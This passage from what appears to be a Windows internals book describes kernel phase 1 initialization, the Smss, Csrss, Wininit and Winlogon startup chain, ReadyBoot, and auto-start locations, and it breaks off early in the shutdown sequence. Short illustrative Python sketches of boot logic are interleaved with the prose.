systemwide process mitigation options are initialized and merged with the options specified in the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel\MitigationOptions registry value. The process manager then creates the executive system partition object, which is called MemoryPartition0. The name is a little misleading because the object is actually an executive partition object, a new Windows object type that encapsulates a memory partition and a cache manager partition (for supporting the new application containers).

4. The process manager also creates a process object for the initial process and names it Idle. As its last step, the process manager creates the System protected process and a system thread to execute the routine Phase1Initialization. This thread doesn't start running right away because interrupts are still disabled. The System process is created as protected to get protection from user-mode attacks, because its virtual address space is used to map sensitive data used by the system and by the Code Integrity driver. Furthermore, kernel handles are maintained in the system process's handle table.
5. The user-mode debugging framework creates the definition of the debug object type that is used for attaching a debugger to a process and receiving debugger events. For more information on user-mode debugging, see Chapter 8, "System mechanisms."

6. The Plug and Play manager's phase 0 initialization then takes place, which involves initializing an executive resource used to synchronize access to bus resources.
When control returns to KiInitializeKernel, the last step is to allocate the DPC stack for the current processor, raise the IRQL to dispatch level, and enable the interrupts. Then control proceeds to the Idle loop, which causes the system thread created in step 4 to begin executing phase 1. (Secondary processors wait to begin their initialization until step 11 of phase 1, which is described in the following list.)
Kernel initialization phase 1
As soon as the Idle thread has a chance to execute, phase 1 of kernel initialization begins. Phase 1 consists of the following steps:

1. Phase1InitializationDiscard, as the name implies, discards the code that is part of the INIT section of the kernel image in order to preserve memory.

2. The initialization thread sets its priority to 31, the highest possible, to prevent preemption.

3. The BCD option that specifies the maximum number of virtual processors (hypervisorrootproc) is evaluated.

4. The NUMA/group topology relationships are created, in which the system tries to come up with the most optimized mapping between logical processors and processor groups, taking into account NUMA localities and distances, unless overridden by the relevant BCD settings.

5. HalInitSystem performs phase 1 of its initialization. It prepares the system to accept interrupts from external peripherals.

6. The system clock interrupt is initialized, and the system clock tick generation is enabled.
CHAPTER 12 Startup and shutdown
825
7. The old boot video driver (bootvid) is initialized. It's used only for printing debug messages and messages generated by native applications launched by SMSS, such as the NT chkdsk.
8. The kernel builds various strings and version information, which are displayed on the boot screen through Bootvid if the sos boot option was enabled. This includes the full version information, number of processors supported, and amount of memory supported.
9. The power manager's initialization is called.
10. The system time is initialized (by calling HalQueryRealTimeClock) and then stored as the time the system booted.
11. On a multiprocessor system, the remaining processors are initialized by KeStartAllProcessors
and HalAllProcessorsStarted. The number of processors that will be initialized and supported
depends on a combination of the actual physical count, the licensing information for the
installed SKU of Windows, boot options such as numproc and bootproc, and whether dynamic
partitioning is enabled (server systems only). After all the available processors have initialized,
the affinity of the system process is updated to include all processors.
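The limit computation in step 11 reduces to taking the minimum over several independent caps. The following is an illustrative sketch only; the function and parameter names are invented, and the real kernel logic handles licensing and dynamic partitioning in far more detail:

```python
def supported_processor_count(physical_count, license_limit,
                              numproc=None, bootproc=None):
    """Illustrative sketch: the processors initialized at boot are capped by
    the physical count, the installed SKU's license limit, and the optional
    numproc/bootproc BCD settings."""
    limit = min(physical_count, license_limit)
    if numproc is not None:    # BCD 'numproc' caps the usable processors
        limit = min(limit, numproc)
    if bootproc is not None:   # BCD 'bootproc' caps processors started at boot
        limit = min(limit, bootproc)
    return limit

print(supported_processor_count(64, 256, numproc=8))  # the tightest cap wins
```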
12. The object manager initializes the global system silo, the per-processor nonpaged lookaside lists and descriptors, and base auditing (if enabled by the system control vector). It then creates the namespace root directory (\), the \KernelObjects directory, the \ObjectTypes directory, and the DOS device name mapping directory (\Global??), with the Global and GLOBALROOT links created in it. The object manager then creates the silo device map that will control the DOS device name mapping and attaches it to the system process. It creates the old \DosDevices symbolic link (maintained for compatibility reasons) that points to the Windows subsystem device name mapping directory. The object manager finally inserts each registered object type in the \ObjectTypes directory object.
13. The executive is called to create the executive object types, including semaphore, mutex, event,
timer, keyed event, push lock, and thread pool worker.
14. The I/O manager is called to create the I/O manager object types, including device, driver, con-
troller, adapter, I/O completion, wait completion, and file objects.
15. The kernel initializes the system watchdogs. There are two main types of watchdog: the DPC watchdog, which checks that a DPC routine will not execute for more than a specified amount of time, and the CPU Keep Alive watchdog, which verifies that each CPU is always responsive. The watchdogs aren't initialized if the system is executed by a hypervisor.
16. The kernel initializes each CPU processor control block (KPRCB) data structure, calculates the
Numa cost array, and finally calculates the System Tick and Quantum duration.
17. The kernel debugger library finalizes the initialization of debugging settings and parameters,
regardless of whether the debugger has been triggered prior to this point.
18. The transaction manager also creates its object types, such as the enlistment, resource man-
ager, and transaction manager types.
19. The user-mode debugging library (Dbgk) data structures are initialized for the global system silo.
20. If driver verifier is enabled and, depending on verification options, pool verification is enabled,
object handle tracing is started for the system process.
21. The security reference monitor creates the \Security directory in the object manager namespace, protecting it with a security descriptor in which only the SYSTEM account has full access, and initializes auditing data structures if auditing is enabled. Furthermore, the security reference monitor initializes the kernel-mode SDDL library and creates the event that will be signaled after the LSA has initialized (\Security\LSA_AUTHENTICATION_INITIALIZED). Finally, the security reference monitor initializes the Kernel Code Integrity component (Ci.dll) for the first time by calling the internal CiInitialize routine, which initializes all the Code Integrity callbacks and saves the list of boot drivers for further auditing and verification.
22. The process manager creates a system handle for the executive system partition. The handle
will never be dereferenced, so as a result the system partition cannot be destroyed. The Process
Manager then initializes the support for kernel optional extension (more details are in step 26).
It registers host callouts for various OS services, like the Background Activity Moderator (BAM),
Desktop Activity Moderator (DAM), Multimedia Class Scheduler Service (MMCSS), Kernel
Hardware Tracing, and Windows Defender System Guard.
Finally, if VSM is enabled, it creates the first minimal process, the IUM System Process, and
assigns it the name Secure System.
23. The \SystemRoot symbolic link is created.
24. The memory manager is called to perform phase 1 of its initialization. This phase creates the
Section object type, initializes all its associated data structures (like the control area), and
creates the \Device\PhysicalMemory section object. It then initializes the kernel Control Flow
Guard support and creates the pagefile-backed sections that will be used to describe the user
mode CFG bitmap(s). (Read more about Control Flow Guard in Chapter 7, Part 1.) The memory
manager initializes the Memory Enclave support (for SGX compatible systems), the hot-patch
support, the page-combining data structures, and the system memory events. Finally, it spawns
three memory manager system worker threads (Balance Set Manager, Process Swapper, and
Zero Page Thread, which are explained in Chapter 5 of Part 1) and creates a section object used
to map the API Set schema memory buffer in the system space (which has been previously al-
located by the Windows Loader). The just-created system threads have the chance to execute
later, at the end of phase 1.
25. NLS tables are mapped into system space so that they can be mapped easily by user-mode
processes.
26. The cache manager initializes the file system cache data structures and creates its worker threads.
27. The configuration manager creates the \Registry key object in the object manager namespace and opens the in-memory SYSTEM hive as a proper hive file. It then copies the initial hardware tree data passed by Winload into the volatile HARDWARE hive.
28. The system initializes Kernel Optional Extensions. This functionality has been introduced in
Windows 8.1 with the goal of exporting private system components and Windows loader data
(like memory caching requirements, UEFI runtime services pointers, UEFI memory map, SMBIOS
data, secure boot policies, and Code Integrity data) to different kernel components (like the
Secure Kernel) without using the standard PE (portable executable) exports.
29. The errata manager initializes and scans the registry for errata information, as well as the
INF (driver installation file, described in Chapter 6 of Part 1) database containing errata for
various drivers.
30. The manufacturing-related settings are processed. The manufacturing mode is a special
operating system mode that can be used for manufacturing-related tasks, such as compo-
nents and support testing. This feature is used especially in mobile systems and is provided by
the UEFI subsystem. If the firmware indicates to the OS (through a specific UEFI protocol) that
this special mode is enabled, Windows reads and writes all the needed information from the
HKLM\System\CurrentControlSet\Control\ManufacturingMode registry key.
31. Superfetch and the prefetcher are initialized.
32. The Kernel Virtual Store Manager is initialized. The component is part of memory compression.
33. The VM Component is initialized. This component is a kernel optional extension used to com-
municate with the hypervisor.
34. The current time zone information is initialized and set.
35. Global file system driver data structures are initialized.
36. The NT Rtl compression engine is initialized.
37. The support for the hypervisor debugger, if needed, is set up, so that the rest of the system
does not use its own device.
38. Phase 1 of debugger-transport-specific information is performed by calling the KdDebuggerInitialize1 routine in the registered transport, such as Kdcom.dll.
39. The advanced local procedure call (ALPC) subsystem initializes the ALPC port type and ALPC
waitable port type objects. The older LPC objects are set as aliases.
40. If the system was booted with boot logging (with the BCD bootlog option), the boot log file
is initialized. If the system was booted in safe mode, it finds out if an alternate shell must be
launched (as in the case of a safe mode with command prompt boot).
41. The executive is called to execute its second initialization phase, where it configures part of the
Windows licensing functionality in the kernel, such as validating the registry settings that hold
license data. Also, if persistent data from boot applications is present (such as memory diagnos-
tic results or resume from hibernation information), the relevant log files and information are
written to disk or to the registry.
42. The MiniNT/WinPE registry keys are created if this is such a boot, and the NLS object directory
is created in the namespace, which will be used later to host the section objects for the various
memory-mapped NLS files.
43. The Windows kernel Code Integrity policies (like the list of trusted signers and certificate
hashes) and debugging options are initialized, and all the related settings are copied from
the Loader Block to the kernel CI module (Ci.dll).
44. The power manager is called to initialize again. This time it sets up support for power requests,
the power watchdogs, the ALPC channel for brightness notifications, and profile callback support.
45. The I/O manager initialization now takes place. This stage is a complex phase of system startup
that accounts for most of the boot time.
The I/O manager first initializes various internal structures and creates the driver and device object types as well as its root directories: \Driver, \FileSystem, \FileSystemFilters, and \UMDFCommunicationPorts (for the UMDF driver framework). It then initializes the Kernel Shim Engine and calls the Plug and Play manager, power manager, and HAL to begin the
various stages of dynamic device enumeration and initialization. (We covered all the details
of this complex and specific process in Chapter 6 of Part 1.) Then the Windows Management
Instrumentation (WMI) subsystem is initialized, which provides WMI support for device drivers.
(See the section “Windows Management Instrumentation” in Chapter 10 for more information.)
This also initializes Event Tracing for Windows (ETW) and writes all the boot persistent data
ETW events, if any.
The I/O manager starts the platform-specific error driver and initializes the global table of
hardware error sources. These two are vital components of the Windows Hardware Error
infrastructure. Then it performs the first Secure Kernel call, asking the Secure Kernel to per-
form the last stage of its initialization in VTL 1. Also, the encrypted secure dump driver is
initialized, reading part of its configuration from the Windows registry (HKLM\System\CurrentControlSet\Control\CrashControl).
All the boot-start drivers are enumerated and ordered while respecting their dependencies and
load-ordering. (Details on the processing of the driver load control information on the registry
are also covered in Chapter 6 of Part 1.) All the linked kernel mode DLLs are initialized with the
built-in RAW file system driver.
At this stage, the I/O manager maps Ntdll.dll, Vertdll.dll, and the WOW64 version of Ntdll into
the system address space. Finally, all the boot-start drivers are called to perform their driver-
specific initialization, and then the system-start device drivers are started. The Windows sub-
system device names are created as symbolic links in the object manager’s namespace.
46. The configuration manager registers and starts its Windows registry’s ETW Trace Logging
Provider. This allows the tracing of the entire configuration manager.
47. The transaction manager sets up the Windows software trace preprocessor (WPP) and registers
its ETW Provider.
48. Now that boot-start and system-start drivers are loaded, the errata manager loads the INF
database with the driver errata and begins parsing it, which includes applying registry PCI
configuration workarounds.
49. If the computer is booting in safe mode, this fact is recorded in the registry.
50. Unless explicitly disabled in the registry, paging of kernel-mode code (in Ntoskrnl and drivers)
is enabled.
51. The power manager is called to finalize its initialization.
52. The kernel clock timer support is initialized.
53. Before the INIT section of Ntoskrnl will be discarded, the rest of the licensing information for
the system is copied into a private system section, including the current policy settings that are
stored in the registry. The system expiration time is then set.
54. The process manager is called to set up rate limiting for jobs and the system process creation
time. It initializes the static environment for protected processes, and looks up various system-
defined entry points in the user-mode system libraries previously mapped by the I/O manager
(usually Ntdll.dll, Ntdll32.dll, and Vertdll.dll).
55. The security reference monitor is called to create the Command Server thread that commu-
nicates with LSASS. This phase creates the Reference Monitor command port, used by LSA to
send commands to the SRM. (See the section "Security system components" in Chapter 7 in Part
1 for more on how security is enforced in Windows.)
56. If the VSM is enabled, the encrypted VSM keys are saved to disk. The system user-mode librar-
ies are mapped into the Secure System Process. In this way, the Secure Kernel receives all the
needed information about the VTL 0’s system DLLs.
57. The Session Manager (Smss) process (introduced in Chapter 2, System architecture, in Part 1)
is started. Smss is responsible for creating the user-mode environment that provides the visible
interface to Windows; its initialization steps are covered in the next section.
58. The bootvid driver is enabled to allow the NT check disk tool to display the output strings.
59. The TPM boot entropy values are queried. These values can be queried only once per boot, and normally, the TPM system driver should have queried them by now, but if this driver has not been running for some reason (perhaps the user disabled it), the unqueried values would still be available. Therefore, the kernel also manually queries them to avoid this situation; in normal scenarios, the kernel's own query should fail.
60. All the memory used by the loader parameter block and all its references (like the initialization
code of Ntoskrnl and all boot drivers, which reside in the INIT sections) are now freed.
As a final step before considering the executive and kernel initialization complete, the phase 1
initialization thread sets the critical break on termination flag to the new Smss process. In this way, if
the Smss process exits or gets terminated for some reason, the kernel intercepts this, breaks into the
attached debugger (if any), and crashes the system with a CRITICAL_PROCESS_DIED stop code.
If the five-second wait times out (that is, if five seconds elapse), the Session Manager is assumed to
have started successfully, and the phase 1 initialization thread exits. Thus, the boot processor executes
one of the memory manager's system threads created in step 24 or returns to the Idle loop.
Smss, Csrss, and Wininit
Smss is like any other user-mode process except for two differences. First, Windows considers Smss
a trusted part of the operating system. Second, Smss is a native application. Because it's a trusted operating system component, Smss runs as a protected process light (PPL; PPLs are covered in Part 1, Chapter 3, "Processes and jobs") and can perform actions few other processes can perform, such as creating security tokens. Because it's a native application, Smss doesn't use Windows APIs; it uses only core executive APIs known collectively as the Windows native API (which are normally exposed by Ntdll). Smss doesn't use the Win32 APIs, because the Windows subsystem isn't executing when Smss
launches. In fact, one of Smss’s first tasks is to start the Windows subsystem.
Smss initialization has been already covered in the Session Manager section of Chapter 2 of Part 1.
For all the initialization details, please refer to that chapter. When the master Smss creates the children
Smss processes, it passes two section objects’ handles as parameters. The two section objects represent
the shared buffers used for exchanging data between multiple Smss and Csrss instances (one is used to
communicate between the parent and the child Smss processes, and the other is used to communicate
with the client subsystem process). The master Smss spawns the child using the RtlCreateUserProcess routine, specifying a flag to instruct the process manager to create a new session. In this case, the
PspAllocateProcess kernel function calls the memory manager to create the new session address space.
The executable name that the child Smss launches at the end of its initialization is stored in the
shared section, and, as stated in Chapter 2, is usually Wininit.exe for session 0 and Winlogon.exe for any
interactive sessions. An important concept to remember is that before the new session 0 Smss launches
Wininit, it connects to the Master Smss (through the SmApiPort ALPC port) and loads and initializes all
the subsystems.
The session manager acquires the Load Driver privilege and asks the kernel to load and map the Win32k driver into the new session address space (using the NtSetSystemInformation native API). It then launches the client-server subsystem process (Csrss.exe), specifying in the command line the following information: the root Windows Object directory name (\Windows), the shared section objects' handles, the subsystem name (Windows), and the subsystem's DLLs:
■ Basesrv.dll The server side of the subsystem process
■ Sxssrv.dll The side-by-side subsystem support extension module
■ Winsrv.dll The multiuser subsystem support module
The client-server subsystem process performs some initialization: It enables some process mitigation options, removes unneeded privileges from its token, starts its own ETW provider, and initializes a linked list of CSR_PROCESS data structures to trace all the Win32 processes that will be started in the system. It then parses its command line, grabs the shared sections' handles, and creates two ALPC ports:
■ CSR API command port (\Sessions\<ID>\Windows\ApiPort) This ALPC port will be used by every Win32 process to communicate with the Csrss subsystem. (Kernelbase.dll connects to it in its initialization routine.)
■ Subsystem Session Manager API port (\Sessions\<ID>\Windows\SbApiPort) This port is used by the session manager to send commands to Csrss.
Csrss creates the two threads used to dispatch the commands received by the ALPC ports. Finally,
it connects to the Session Manager, through another ALPC port (SmApiPort), which was previously
created in the Smss initialization process (step 6 of the initialization procedure described in Chapter 2).
In the connection process, the Csrss process sends the name of the just-created Session Manager API
port. From now on, new interactive sessions can be started. So, the main Csrss thread finally exits.
After spawning the subsystem process, the child Smss launches the initial process (Wininit or
Winlogon) and then exits. Only the master instance of Smss remains active. The main thread in Smss
waits forever on the process handle of Csrss, whereas the other ALPC threads wait for messages to
create new sessions or subsystems. If either Wininit or Csrss terminate unexpectedly, the kernel crashes
the system because these processes are marked as critical. If Winlogon terminates unexpectedly, the
session associated with it is logged off.
Pending file rename operations
The fact that executable images and DLLs are memory-mapped when they're used makes it impossible to update core system files after Windows has finished booting (unless hotpatching technology is used, but that's only for Microsoft patches to the operating system). The MoveFileEx Windows
API has an option to specify that a file move be delayed until the next boot. Service packs and
hotfixes that must update in-use memory-mapped files install replacement files onto a system in
temporary locations and use the MoveFileEx API to have them replace otherwise in-use files. When used with that option, MoveFileEx simply records commands in the PendingFileRenameOperations and PendingFileRenameOperations2 values under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager. These registry values are of type MULTI_SZ, where each operation is specified in pairs of file names: The first file name is the source location, and the second is the target location. Delete operations use an empty string as their target path. You can use the Pendmoves utility from Windows Sysinternals (https://docs.microsoft.com/en-us/sysinternals/) to view registered delayed
rename and delete commands.
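The pairs-of-names layout of these values can be demonstrated with a short parser. This is a sketch operating on an already-decoded list of strings (a MULTI_SZ value is a NUL-separated string sequence); the function name is invented, and the handling of a leading "!" on the target (a marker for replace-existing moves) is an assumption drawn from the MoveFileEx documentation rather than from the text above:

```python
def parse_pending_renames(strings):
    """Sketch: interpret a PendingFileRenameOperations-style value.
    Entries come in pairs (source, target); an empty target means the
    source file is deleted at the next boot."""
    ops = []
    for src, dst in zip(strings[0::2], strings[1::2]):
        if dst == "":
            ops.append(("delete", src))
        else:
            # Assumption: a leading '!' marks a replace-existing move.
            ops.append(("rename", src, dst.lstrip("!")))
    return ops

value = [r"\??\C:\Temp\new.sys", r"!\??\C:\Windows\System32\drivers\old.sys",
         r"\??\C:\Temp\stale.tmp", ""]
for op in parse_pending_renames(value):
    print(op)
```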
Wininit performs its startup steps, as described in the “Windows initialization process” section of
Chapter 2 in Part 1, such as creating the initial window station and desktop objects. It also sets up the
user environment, starts the Shutdown RPC server and WSI interface (see the Shutdown section later
in this chapter for further details), and creates the service control manager (SCM) process (Services.exe),
which loads all services and device drivers marked for auto-start. The local session manager (Lsm.dll)
service, which runs in a shared Svchost process, is launched at this time. Wininit next checks whether
there has been a previous system crash, and, if so, it carves the crash dump and starts the Windows
Error Reporting process (werfault.exe) for further processing. It finally starts the Local Security
Authentication Subsystem Service (%SystemRoot%\System32\Lsass.exe) and, if Credential Guard is enabled, the Isolated LSA Trustlet (Lsaiso.exe), and waits forever for a system shutdown request.
On session 1 and beyond, Winlogon runs instead. While Wininit creates the noninteractive session 0 window station, Winlogon creates the default interactive-session window station, called WinSta0, and two desktops: the Winlogon secure desktop and the default user desktop. Winlogon then queries the system boot information using the NtQuerySystemInformation API (only on the first interactive logon session). If the boot configuration includes the volatile Os Selection menu flag, it starts the GDI
system (spawning a UMDF host process, fontdrvhost.exe) and launches the modern boot menu appli-
cation (Bootim.exe). The volatile Os Selection menu flag is set in early boot stages by the Bootmgr only
if a multiboot environment was previously detected (for more details see the section "The boot menu" earlier in this chapter).
Bootim is the GUI application that draws the modern boot menu. The new modern boot uses the
Win32 subsystem (graphics driver and GDI calls) with the goal of supporting high resolutions for
displaying boot choices and advanced options. Even touchscreens are supported, so the user can select
which operating system to launch using a simple touch. Winlogon spawns the new Bootim process
and waits for its termination. When the user makes a selection, Bootim exits. Winlogon checks the exit
code thus it’s able to detect whether the user has selected an OS or a boot tool or has simply re-
quested a system shutdown. If the user has selected an OS different from the current one, Bootim adds
the sequene one-shot BCD option in the main system boot store (see the section The Windows
Boot Manager earlier in this chapter for more details about the BCD store). The new boot seuence is
recognized (and the BCD option deleted) by the Windows Boot Manager after Winlogon has restarted
the machine using NtShutdownSystem API. Winlogon marks the previous boot entry as good before
restarting the system.
EXPERIMENT: Playing with the modern boot menu
The modern boot menu application, spawned by Winlogon after Csrss is started, is really a clas-
sical Win32 GUI application. This experiment demonstrates it. In this case, it’s better if you start
with a properly configured multiboot system; otherwise, you won't be able to see the multiple
entries in the Modern boot menu.
Open a non-elevated console window (by typing cmd in the Start menu search box) and go
to the WindowsSystem32 path of the boot volume by typing cd /d C:\Windows\System32
(where C is the letter of your boot volume). Then type Bootim.exe and press Enter. A screen
similar to the modern boot menu should appear, showing only the Turn Off Your Computer op-
tion. This is because the Bootim process has been started under the standard non-administrative
token (the one generated for User Account Control). Indeed, the process isn’t able to access the
system boot configuration data. Press Ctrl+Alt+Del to start the Task Manager and terminate the
BootIm process, or simply select Turn Off Your Computer. The actual shutdown process is start-
ed by the caller process (which is Winlogon in the original boot sequence) and not by BootIm.
Now you should run the Command Prompt window with an administrative token by right-
clicking its taskbar icon or the Command Prompt item in the Windows search box and selecting
Run As Administrator. In the new administrative prompt, start the BootIm executable. This time
you will see the real modern boot menu, compiled with all the boot options and tools, similar to
the one shown in the following picture
In all other cases, Winlogon waits for the initialization of the LSASS process and LSM service. It
then spawns a new instance of the DWM process (Desktop Windows Manager, a component used to
draw the modern graphical interface) and loads the registered credential providers for the system (by
default, the Microsoft credential provider supports password-based, pin-based, and biometrics-based
logons) into a child process called LogonUI (%SystemRoot%\System32\Logonui.exe), which is responsible for displaying the logon interface. (For more details on the startup sequence for Wininit, Winlogon,
and LSASS, see the section “Winlogon initialization” in Chapter 7 in Part 1.)
After launching the LogonUI process, Winlogon starts its internal finite-state machine. This is used
to manage all the possible states generated by the different logon types, like the standard interactive
logon, terminal server, fast user switch, and hiberboot. In standard interactive logon types, Winlogon
shows a welcome screen and waits for an interactive logon notification from the credential provider
(configuring the SAS sequence if needed). When the user has inserted their credentials (which can be a password, PIN, or biometric information), Winlogon creates a logon session LUID and validates the
logon using the authentication packages registered in Lsass (a process for which you can find more
information in the section "User logon steps" in Chapter 7 in Part 1). Even if the authentication doesn't succeed, Winlogon at this stage marks the current boot as good. If the authentication succeeded, Winlogon verifies the sequential logon scenario in the case of client SKUs, in which only one session at a time can be active; if this is not the case and another session is active, it asks the user how to proceed. It then loads the registry hive from the profile of the user logging on, mapping it to HKCU. It adds the required ACLs to the new session's Windows Station and Desktop and creates the user's environment variables that are stored in HKCU\Environment.
Winlogon next waits for the Sihost process and starts the shell by launching the executable or executables specified in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (with multiple executables separated by commas), which by default points at \Windows\System32\Userinit.exe. The new Userinit process lives in the Winsta0\Default desktop. Userinit.exe performs the following steps:
1. Creates the per-session volatile Explorer Session key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\<session>.
2. Processes the user scripts specified in HKCU\Software\Policies\Microsoft\Windows\System\Scripts and the machine logon scripts in HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts. (Because machine scripts run after user scripts, they can override user settings.)
3. Launches the comma-separated shell or shells specified in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell. If that value doesn't exist, Userinit.exe launches the shell or shells specified in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, which is by default Explorer.exe.
4. If Group Policy specifies a user profile quota, starts %SystemRoot%\System32\Proquota.exe to enforce the quota for the current user.
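The lookup in step 3 is a two-level fallback over a comma-separated value. A minimal sketch, with plain dictionaries standing in for the HKCU and HKLM Winlogon keys (the function name is invented):

```python
def resolve_shells(hkcu_winlogon, hklm_winlogon):
    """Sketch of Userinit's shell selection: prefer the per-user Shell value,
    fall back to the machine-wide one, and default to Explorer.exe."""
    value = (hkcu_winlogon.get("Shell")
             or hklm_winlogon.get("Shell")
             or "Explorer.exe")
    # The value may name several executables separated by commas.
    return [s.strip() for s in value.split(",") if s.strip()]

print(resolve_shells({}, {}))                               # default shell
print(resolve_shells({"Shell": "cmd.exe, custom.exe"}, {})) # per-user override
```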
Winlogon then notifies registered network providers that a user has logged on, starting the mpnotify.exe process. The Microsoft network provider, Multiple Provider Router (%SystemRoot%\System32\Mpr.dll), restores the user's persistent drive letter and printer mappings stored in HKCU\Network and HKCU\Printers, respectively. Figure 12-11 shows the process tree as seen in Process Monitor after a
logon (using its boot logging capability). Note the Smss processes that are dimmed (meaning that they
have since exited). These refer to the spawned copies that initialize each session.
CHAPTER 12 Startup and shutdown
835
FIGURE 12-11 Process tree during logon.
ReadyBoot
Windows uses the standard logical boot-time prefetcher (described in Chapter 5 of Part 1) if the system
has less than 400 MB of free memory, but if the system has 400 MB or more of free RAM, it uses an in-
RAM cache to optimize the boot process. The size of the cache depends on the total RAM available, but
it’s large enough to create a reasonable cache and yet allow the system the memory it needs to boot
smoothly. ReadyBoot is implemented in two distinct binaries: the ReadyBoost driver (Rdyboost.sys) and
the Sysmain service (Sysmain.dll, which also implements SuperFetch).
The cache is implemented by the Store Manager in the same device driver that implements
ReadyBoost caching (Rdyboost.sys), but the cache’s population is guided by the boot plan previously
stored in the registry. Although the boot cache could be compressed like the ReadyBoost cache, an-
other difference between ReadyBoost and ReadyBoot cache management is that while in ReadyBoot
mode, the cache is not encrypted. The ReadyBoost service deletes the cache 50 seconds after the
service starts, or if other memory demands warrant it.
When the system boots, at phase 1 of the NT kernel initialization, the ReadyBoost driver, which is
a volume filter driver, intercepts the boot volume creation and decides whether to enable the cache.
The cache is enabled only if the target volume is registered in the HKLM\System\CurrentControlSet\
Services\rdyboost\Parameters\ReadyBootVolumeUniqueId registry value. This value contains the ID of
the boot volume. If ReadyBoot is enabled, the ReadyBoost driver starts to log all the volume boot I/Os
(through ETW), and, if a previous boot plan is registered in the BootPlan registry binary value, it spawns
a system thread that will populate the entire cache using asynchronous volume reads. When a new
Windows OS is installed, at the first system boot these two registry values do not exist, so neither the
cache nor the log trace are enabled.
In this situation the Sysmain service, which is started later in the boot process by the SCM, deter-
mines whether the cache needs to be enabled, checking the system configuration and the running
Windows SKU. There are situations in which ReadyBoot is completely disabled, such as when the boot
disk is a solid state drive. If the check yields a positive result, Sysmain enables ReadyBoot by writing the
boot volume ID on the relative registry value (ReadyBootVolumeUniqueId) and by enabling the WMI
ReadyBoot Autologger in the HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\Readyboot
registry key. At the next system boot, the ReadyBoost driver logs all the volume I/Os but without popu-
lating the cache (still no boot plan exists).
After every successive boot, the Sysmain service uses idle CPU time to calculate a boot-time caching
plan for the next boot. It analyzes the recorded ETW I/O events and identifies which files were accessed and
where they're located on disk. It then stores the processed traces in %SystemRoot%\Prefetch\ReadyBoot as
.fx files and calculates the new caching boot plan using the trace files of the five previous boots. The Sysmain
service stores the newly generated plan under the BootPlan registry value, as shown in Figure 12-12. The
ReadyBoost boot driver reads the boot plan and populates the cache, minimizing the overall boot startup time.
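The plan calculation described above can be sketched roughly as follows. This is an illustrative model, not the real Sysmain algorithm: it simply keeps the files observed in the five most recent boot traces and orders them by on-disk location, so that populating the cache favors sequential reads:

```python
# Hypothetical sketch of deriving a boot caching plan from the trace
# files of the five previous boots (not the actual Sysmain logic).
def build_boot_plan(traces):
    """traces: chronological list of boot traces, each a list of
    (file_name, disk_offset) tuples recorded via ETW."""
    recent = traces[-5:]                 # only the five previous boots
    seen = {}
    for trace in recent:
        for name, offset in trace:
            seen.setdefault(name, offset)
    # Sort by disk location so the cache fill is mostly sequential I/O.
    return [name for name, _ in sorted(seen.items(), key=lambda kv: kv[1])]

traces = [
    [("ntoskrnl.exe", 10), ("hal.dll", 5)],
    [("ntoskrnl.exe", 10), ("win32k.sys", 20)],
]
print(build_boot_plan(traces))   # -> ['hal.dll', 'ntoskrnl.exe', 'win32k.sys']
```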
FIGURE 12-12 ReadyBoot configuration and statistics.
Images that start automatically
In addition to the Userinit and Shell registry values in Winlogon's key, there are many other registry
locations and directories that default system components check and process for automatic process
startup during the boot and logon processes. The Msconfig utility (%SystemRoot%\System32\Msconfig.exe)
displays the images configured by several of the locations. The Autoruns tool, which you can download
from Sysinternals and is shown in Figure 12-13, examines more locations than Msconfig and displays
more information about the images configured to automatically run. By default, Autoruns shows only
the locations that are configured to automatically execute at least one image, but selecting the Include
Empty Locations entry on the Options menu causes Autoruns to show all the locations it inspects.
The Options menu also has selections to direct Autoruns to hide Microsoft entries, but you should
always combine this option with Verify Image Signatures; otherwise, you risk hiding malicious pro-
grams that include false information about their company name.
FIGURE 12-13 The Autoruns tool available from Sysinternals.
Shutdown
The system shutdown process involves different components. Wininit, after having performed all its
initialization, waits for a system shutdown.
If someone is logged on and a process initiates a shutdown by calling the Windows ExitWindowsEx
function, a message is sent to that session's Csrss instructing it to perform the shutdown. Csrss in turn
impersonates the caller and sends an RPC message to Winlogon, telling it to perform a system shut-
down. Winlogon checks whether the system is in the middle of a hybrid boot transition (for further
details about hybrid boot, see the "Hibernation and Fast Startup" section later in this chapter), then
impersonates the currently logged-on user (who might or might not have the same security context as
the user who initiated the system shutdown), asks LogonUI to fade out the screen (configurable
through the registry value HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
FadePeriodConfiguration), and calls ExitWindowsEx with special internal flags. Again, this call causes a
message to be sent to the Csrss process inside that session, requesting a system shutdown.
This time, Csrss sees that the request is from Winlogon and loops through all the processes in the
logon session of the interactive user (again, not the user who requested a shutdown) in reverse order
of their shutdown level. A process can specify a shutdown level, which indicates to the system when it
wants to exit with respect to other processes, by calling SetProcessShutdownParameters. Valid shut-
down levels are in the range 0 through 1023, and the default level is 640. Explorer, for example, sets
its shutdown level to 2, and Task Manager specifies 1. For each active process that owns a top-level
window, Csrss sends the WM_QUERYENDSESSION message to each thread in the process that has
a Windows message loop. If the thread returns TRUE, the system shutdown can proceed. Csrss then
sends the WM_ENDSESSION Windows message to the thread to request it to exit. Csrss waits the num-
ber of seconds defined in HKCU\Control Panel\Desktop\HungAppTimeout for the thread to exit. (The
default is 5000 milliseconds.)
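The "reverse order of shutdown level" notification order described above can be modeled in a few lines. This is a sketch with invented process names and helper function; only the level semantics (0 through 1023, default 640, higher levels notified first, so Explorer at 2 and Task Manager at 1 go near the end) come from the text:

```python
# Sketch of the notification order Csrss uses: descending shutdown level.
DEFAULT_SHUTDOWN_LEVEL = 640   # used when a process never calls
                               # SetProcessShutdownParameters

def shutdown_order(processes):
    """processes: dict of process name -> shutdown level (0-1023).
    Returns names in the order they would be asked to exit."""
    return sorted(processes, key=lambda name: processes[name], reverse=True)

procs = {"Explorer": 2, "Taskmgr": 1, "MyApp": DEFAULT_SHUTDOWN_LEVEL}
print(shutdown_order(procs))   # -> ['MyApp', 'Explorer', 'Taskmgr']
```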
If the thread doesn't exit before the timeout, Csrss fades out the screen and displays the hung-
program screen shown in Figure 12-14. (You can disable this screen by creating the registry value HKCU\
Control Panel\Desktop\AutoEndTasks and setting it to 1.) This screen indicates which programs are
